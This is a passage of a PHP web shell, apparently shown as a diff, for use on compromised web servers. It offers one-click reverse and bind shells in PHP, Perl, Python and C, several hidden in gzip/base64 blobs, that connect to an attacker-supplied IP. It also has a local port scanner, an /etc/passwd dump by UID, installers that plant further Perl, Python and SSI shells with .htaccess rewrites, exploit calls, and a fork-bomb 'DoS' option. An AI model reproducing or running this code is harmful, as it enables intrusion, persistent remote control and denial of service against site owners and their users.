'; + } + } //failcheck end + if (!empty($_POST["shellz"])) { + //code by security-teams.net + $perlbdcode='#!'.search("perl",$failflag).' + use IO::Socket::INET; + $server = IO::Socket::INET->new( + LocalPort => '.$_POST["port"].','; + $perlbdcode.=gzinflate(base64_decode('bY/RCoIwFIbve4rjiJhhSNemEGYQpYIadBFE6RFHpuKsiPDdc6ZB1C7G9n3/OdsBECt4FNgeQDfAd831wQ88a24rgzf18Mqx99OebhivMPtU2fOd6TrOW8qQlxAxpGR5ZClG0j4jsibcPWnudCyioMOQY3nDcmIcwxCLisqyyDzbJiymUpyX5w52FPKiedQPFitHASCzkehEtG/nbgMFiPHXWZ734/ijGeVCiXpimcqT7qtQt3uY5s30It7SevAC')); + //code by Michael Schierl + $perlbccode='#!'.search("perl",$failflag); + $perlbccode.="\n"; + $perlbccode.=gzinflate(base64_decode('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')); + //author/license unknown + $cbdcode=gzinflate(base64_decode('bVBha8IwEP3eX3FMmOns1H2uDoo6kDEV7ZexSejaVA9rKkkUq+y/75q6Drd9CHl59y737jVQxtk+EdDTJsG8vX50Gj8UrmSU/eIK3THFTui/tM7jjTDXvBQG6XRQljxKA6TiidCeBXGGFVBxdWdCEhDqIBTfYeIBKUrgO9qofWzbN1GSKI7S6nj58OG/MrUKaSqBHb2NiGUlitSKBsbrSMEd4cPb0nXOYEXoO2muGPa7PvZKnY+tlgtnZyu2Whhm5bj0mu/HbtOjsWT5m3Rd3/m0VuNdUZHdpXdDAWgTmRuqXraHPlRpseCJjyej0IPFdPDMF+F8FLx4MJ7N5tNwysPBzKXlMAVWd/bh/sEFRxzRMEJU/jgJlTNWrePCbZ0LRYknkaesZkqH9aOtUfI02mJWkKGLkzLLK0EF7EWqtcllxsaTYDic82DySv99AQ==')); + $cbdcode.='serv_addr.sin_port = htons('.$_POST["port"].');'; + $cbdcode.="\n"; + $cbdcode.=gzinflate(base64_decode('hVJBasMwELznFVsfilRUEgd6cnNOcymF0rNxpbUtImwjKWloyd+7suzGaQjBIHtn2PHMINfK3EpYwaduFHM0KXQCmPN2Jz0QsC2UsvDA4d6h3edhEuD0N7Yl+0M4z2a6hF6A5O5WsOAww4P27DHlGfRk2dot42fkInAOfVfZjtE3DbpqCsPeN+uXjzcB9M4369ebEmMMo53H5hTk6bqxfvGr1gaBpRx+oorBhmSGfNJobHxMmPU0IUQXUmLnb9Q1WRZUXtSe2AlSz//sEJZ3WtEvKipFKxb7sXu0Ax4bGOqYMDEZhVC7bjnqi170DEkvkCV5wgNKw5I53YK5qxORhIPJughRBmetw3EnACfTxwt2dqTnFw==')); + //author/license unknown + 
$cbccode=gzinflate(base64_decode('XVBNawIxEL3nVwwrlESjq161BRELUqui25Msy5pku6FrIkksVfG/N7vWj3oYMvPmzZuXqUnFih0X0LeOS93KX1DtBu1taDX7Eu4/roSTPkKpSlwqB5tUKlwmqflkFFieGqj7/HsVE3SsKBnvIevMjjkoNVPOTSIVWKl6iKdioxXu0DbxJC/rI8nSjSz28AyD12Q8HUW3zlYb5/HcaWVx6rTE1apuTO7GywUtWz2eW/qt8jO1E5MeoPVBGH0BqDdXCHXtNzqNe6QSB5RxL3a+Cf7zRWE5G74ly2gxGrxTGM/ni1k0S6LhnICfkBlgzLRSgjmccQr44QpQJ/DkHVN/i4PQ2WOfENJvEziirTBGGxysmjFcBEngvyx+pMPl6U6I77bdaktZXovOfdGtJgQrcBCupQptHtDA5tCUAYXpx2Ti+6zQVnh2+eUT+gU=')); + // Copyright (C) 2007 pentestmonkey@pentestmonkey.net + $findsock=gzinflate(base64_decode('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')); + //code by b374k + $pybdcode="#!".search("python",$failflag)."\n"; + $pybdcode.=gzinflate(base64_decode('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')); + //code by ont.rif + $pyintserver="#!".search("python",$failflag)."\n"; + $pyintserver.="import sys, socket, os, pty, fcntl, struct, termios, select, resource\n"; + $pyintserver.="host = \"".$_POST["ip"]."\"\n"; + $pyintserver.="port = ".$_POST["port"]."\n"; + $pyintserver.=gzinflate(base64_decode('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')); + switch ($_POST["shellz"]) { + case "phpremote": + // code by pentestmonkey.net. license: GPLv2 + $ip=($_POST["ip"]); + $port=($_POST["port"]); + $chunk_size=1400; + $write_a=null; + $error_a=null; + $shell='/bin/sh -i'; + $daemon = 0; + function printit ($string) { if (!$daemon) { print "$string\n"; }} + if (function_exists('pcntl_fork')) { + $pid = pcntl_fork(); + if ($pid == -1) { printit("ERROR: Can't fork
"); exit(1); } + if ($pid) { exit(0); } + if (posix_setsid() == -1) { printit("Error: Can't setsid()
"); exit(1); } + $daemon = 1; + } else { printit("WARNING: Failed to daemonise!
"); } + umask(0); + $sock = fsockopen($ip, $port, $errno, $errstr, 30); + if (!$sock) { printit("$errstr ($errno)"); exit(1); } + $process = proc_open($shell, $descriptorspec, $pipes); + if (!is_resource($process)) { printit("ERROR: Can't spawn shell
"); exit(1); } + stream_set_blocking($pipes[0], 0); + stream_set_blocking($pipes[1], 0); + stream_set_blocking($pipes[2], 0); + stream_set_blocking($sock, 0); + printit("Successfully opened reverse shell to $ip:$port
"); + while (1) { + if (feof($sock)) { printit("ERROR: Shell connection terminated
"); break; } + if (feof($pipes[1])) { printit("ERROR: Shell process terminated
"); break; } + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + if (in_array($sock, $read_a)) { + $input = fread($sock, $chunk_size); + fwrite($pipes[0], $input); + } + if (in_array($pipes[1], $read_a)) { + $input = fread($pipes[1], $chunk_size); + fwrite($sock, $input); + } + if (in_array($pipes[2], $read_a)) { + $input = fread($pipes[2], $chunk_size); + fwrite($sock, $input); + } + } + fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);@proc_close($process); + //php backconnect end + break; + case "phplocal": + // code by metasploit.com. license unknown, assuming BSD + $port=$_POST["port"]; + $scl='socket_create_listen'; + if (function_enabled($scl)) { + $sock=@$scl($port); + } else { + $sock=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP); + $ret=@socket_bind($sock,0,$port); + $ret=@socket_listen($sock,5); + } + $msgsock=@socket_accept($sock); + @socket_close($sock); + while (FALSE !== @socket_select($r=array($msgsock), $w=NULL, $e=NULL, NULL)) { + $buffer = ''; + $c=@socket_read($msgsock,2048,PHP_NORMAL_READ); + if (FALSE === $c) { break; } + if (substr($c,0,3) == 'cd ') { + chdir(substr($c,3,-1)); + } else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { + break; + } else { + if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) { $c=$c." 
2>&1\n"; } + if (function_enabled('shell_exec')) { + $buffer=shell_exec($c); + } else if(function_enabled('passthru')) { + ob_start(); + passthru($c); + $buffer=ob_get_contents(); + ob_end_clean(); + } else if(function_enabled('system')) { + ob_start(); + system($c); + $buffer=ob_get_contents(); + ob_end_clean(); + } else if(function_enabled('exec')) { + $buffer=array(); + exec($c,$buffer); + $buffer=join(chr(10),$buffer).chr(10); + } else if(function_enabled('proc_open')) { + $handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); + $buffer=NULL; + while (!feof($pipes[1])) { + $buffer.=fread($pipes[1],1024); + } + @proc_close($handle); + } else if(function_enabled('popen')) { + $fp=popen($c,'r'); + $buffer=NULL; + if (is_resource($fp)) { + while (!feof($fp)) { + $buffer.=fread($fp,1024); + } + } + @pclose($fp); + } + else { $buffer=0; } + } + @socket_write($msgsock,$buffer,strlen($buffer)); + } + @socket_close($msgsock); + echo "

phplocal done"; + break; + //phpbind end + case "perllocal": + $exec_path = trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$perlbdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("perl",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; + run($c); + echo "

perllocal done"; + } + //perl bind end + break; + case "perlremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$perlbccode); + fclose($fh); + chmod($exec_path,0644); + $c=search("perl",$failflag).' '.$exec_path.' '.$_POST["ip"].' '.$_POST["port"].' && rm -f '.$exec_path.''; + run($c); + echo "

perlremote done"; + } + break; + //perl backconnect end + case "pylocal": + $exec_path = trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pybdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' -b '.$_POST["port"].' && rm -f '.$exec_path.''; + run($c); + echo "

pylocal done"; + } + //python bind end + case "pyremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pybdcode); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' -r '.$_POST["port"].' '.$_POST["ip"].' && rm -f '.$exec_path.''; + run($c); + echo "

pyremote done"; + } + break; + //python backconnect end + case "pyint": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,'w'); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$pyintserver); + fclose($fh); + chmod($exec_path,0644); + $c=search("python",$failflag).' '.$exec_path.' && rm -f '.$exec_path.''; + run($c); + echo "

pyint done"; + } + break; + //python interactive end + case "clocal": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,"w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$cbdcode); + fclose($fh); + $c=search("gcc",$failflag)." -w ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["port"]." | rm -f ".$exec_path.""; + run($c); + echo "

clocal done"; + } + break; + //C bind end + case "cremote": + $exec_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($exec_path,"w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$cbccode); + fclose($fh); + $c=search("gcc",$failflag)." ".$exec_path." -o ".$exec_path." && ".$exec_path." ".$_POST["ip"]." ".$_POST["port"]." | rm -f ".$exec_path.""; + run($c); + } + break; + case "findsock": + $fs_path=trim($_POST['path']); + ob_start(); + @sploent516(); + ob_end_clean(); + $fh=fopen($fs_path.".c","w"); + if (!$fh) { echo "

can`t fopen!"; } + else { + fwrite($fh,$findsock); + fclose($fh); + $c=search("gcc",$failflag)." ".$fs_path.".c -o ".$fs_path." && rm -f ".$fs_path.".c"; + run($c); + echo "
compiled, now connect to shell via nc and request ?pfs&path=".$fs_path."
"; + } + break; + } + } + echo $pageend; + break; +// --------------------------------------------- bind end; extras + case "e": + if (empty($_POST["extraz"]) and $download != "1") { + echo $title; + echo '---> SysInfo
'; + echo '
>> show << +

"; + echo '---> Extraz

'; + if (!function_enabled('phpinfo')) { echo "fail, phpinfo() is disabled

"; + } else { + echo '

'; + } + if(function_enabled('posix_getpwuid')) { + echo '
"read" /etc/passwd from uid to
'; + if (!empty($_POST["uidz"])) { + echo "
"; + //code by oRb + for(;$_POST['uid1'] <= $_POST['uid2'];$_POST['uid1']++) { + $uid = @posix_getpwuid($_POST['uid1']); + if ($uid) + echo join(':',$uid)."
\n"; + } + } + } + echo "
"; + if(function_enabled('fsockopen')) { + echo '
"scan" local open ports from to
'; + if (!empty($_POST["portz"])) { + for($i=$_POST["port1"]; $i <= $_POST["port2"]; $i++) + { + $fp=@fsockopen("127.0.0.1", $i, $errno, $errstr, 1); + if ($fp) { + echo "-> ".$i."
"; + fclose($fp); + } + } + } + } + echo '
>> minishells help << + '; + if (file_exists(".htaccess")) { + echo '
WARNING: my .htaccess will rewrite current one!'; + } + echo '
put mini perl shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + if ($failflag=="1") { + echo "can't find perl binary (all system functions disabled) assuming /usr/bin/perl
"; + } + echo '
put mini python shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + if ($failflag=="1") { + echo "can't find python binary (all system functions disabled) assuming /usr/bin/python
"; + } + echo '
put mini SSI shell into / adding .htaccess '; + if (is_writable("./")) { + echo "(./ writable)"; + } else { + echo "(./ readonly)"; + } + echo '
'; + echo '
'; + //code by Eric A. Meyer, license CC BY-SA + echo ''; + echo "---> Text encoderz/decoderz

"; + echo "fast URL-encoder:
"; + echo '
'; + echo "
other encoders: "; + $cryptform="
+ +
+ salt: (salt needed for: md5(unix,wordpress,phpbb3,apr1) - 8 symbols, sha(256,512) - 16 symbols, and blowfish - 22 symbols. ignore these fields if you use other algorithms)
+ +
"; + echo $cryptform; + if(isset($_POST['crypt'])) { + $text=$_POST['text']; + if($text == '') { + die("

empty form

\n".$pageend.""); + } + $hash=$_POST['hash']; + $hash1=$_POST['hash1']; + $hash2=$_POST['hash2']; + echo("-->

"); + } + //decoders end + echo '

---> DoS //use this carefully

'; + echo '
'; + echo $pageend; + } + if (!empty($_POST["extraz"])) { + switch ($_POST["extraz"]) { + case "fork": + while(pcntl_fork()|1); + break; + case "pysh": + //code by Michael Foord & 12309, license WTFPL + if ($failflag=="1") { + $pybin="/usr/bin/python"; + } else { + $pybin=search("python",$failflag); + } + $pyshcode='#!'.$pybin; + $pyshcode.="\n"; + $pyshcode.=gzinflate(base64_decode("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")); + $htaccess=$htaccesses['cgi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$pyshcode); + fclose($fh); + echo $_POST["file"]." write done, chmoding..
"; + $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); + if (!$ch) { + echo "chmod failed, make chmod 755 manually
"; + } else { + echo "chmod done
"; + } + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + case "perlsh": + //author/license unknown + if ($failflag=="1") { + $perlbin="/usr/bin/perl"; + } else { + $perlbin=search("perl",$failflag); + } + $perlshcode='#!'.$perlbin; + $perlshcode.="\n"; + $perlshcode.=gzinflate(base64_decode("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")); + $htaccess=$htaccesses['cgi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$perlshcode); + fclose($fh); + echo $_POST["file"]." write done, chmoding..
"; + $ch=chmod($_POST["dir"]."/".$_POST["file"], 0755); + if (!$ch) { + echo "chmod failed, make chmod 755 manually
"; + } else { + echo "chmod done
"; + } + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + case "ssish": + // code by profexer + $ssishcode=gzinflate(base64_decode("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")); + $htaccess=$htaccesses['ssi']; + if (strnatcmp(version(),"5.2.9") <= 0) { + sploent516(); + } + $fh=fopen($_POST["dir"]."/".$_POST["file"],"w"); + if (!$fh) { echo "can`t fopen ".$_POST["dir"]."/".$_POST["file"]."!"; } + else { + fwrite($fh,$ssishcode); + fclose($fh); + echo $_POST["file"]." write done
"; + if ($_POST["htaccess"] == "on") { + $fh=fopen($_POST["dir"]."/.htaccess","w"); + fwrite($fh,$htaccess); + fclose($fh); + echo "htaccess done"; + } + } + break; + } + } + break; +// extras end ### + case "pi": + phpinfo(); + break; +} +// :) +?>